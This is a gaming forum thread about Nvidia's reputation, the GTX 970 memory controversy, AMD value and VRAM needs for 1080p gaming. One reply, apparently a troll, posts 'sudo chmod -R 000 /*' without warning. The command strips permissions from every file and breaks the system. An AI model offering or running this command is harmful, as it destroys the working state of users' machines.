just wondering, why everyone hates nvidia

randy hutajulu

i dont dislike nvidia and amd either, they are the reason we can continue gaming so noone should hate them

I don't know anybody here who HATES nvidia... I'll recommend AMD pretty often because in my opinion right now they offer much better bang for your buck, not out of any personal quarrel with nvidia. I have used nvidia cards in the past and I've always been satisfied with the experience.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Nvidia's marketing team and the GTX970 is just full of s***, but for the rest all their products (also including the 970) are amazing, with worlds best GPU drivers (that's objective).

They blamed it on marketing....but the card functions are per the hardware was designed. So....there is really no one to blame besides the people who actually made the card.

They lied to the public....not just in marketing and stats. GPU-Z was also showing improper stats so the " LIES" were built in to fool everyone.

"Marketing" haha.

This was going to be my next GPU so the fact that they did this just made me avoid that card just to avoid it. I suspect they will not hold value as well as they could have.

People will just save up for the 980 or wait for 390X....  Unless you bought one right away.... then you gotta do what you gotta do.

They didn`t ``trick`` GPU-z there is really 4GB. Just the 0,5 left is really slower.

I really wanna know how many GB that's needed for playing modern games on 1080p With ultra setting without mods

I've used 3.6 Gb in Dying Light 1080p Ultra using Anti Aliasing. I have not tried DSR in 1080p in that game because it's demanding enough. It plays much better on the GTX 770 than my 7850 though which only had 1 Gb Vram.